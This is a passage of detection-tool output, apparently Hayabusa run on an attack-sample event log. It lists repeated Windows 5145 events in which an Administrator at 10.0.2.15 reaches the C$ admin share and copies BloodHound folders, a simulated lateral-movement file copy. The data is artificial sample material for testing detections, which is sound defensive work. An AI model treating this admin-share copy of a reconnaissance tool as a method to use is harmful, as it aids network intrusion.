10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator 
: Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share 
Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
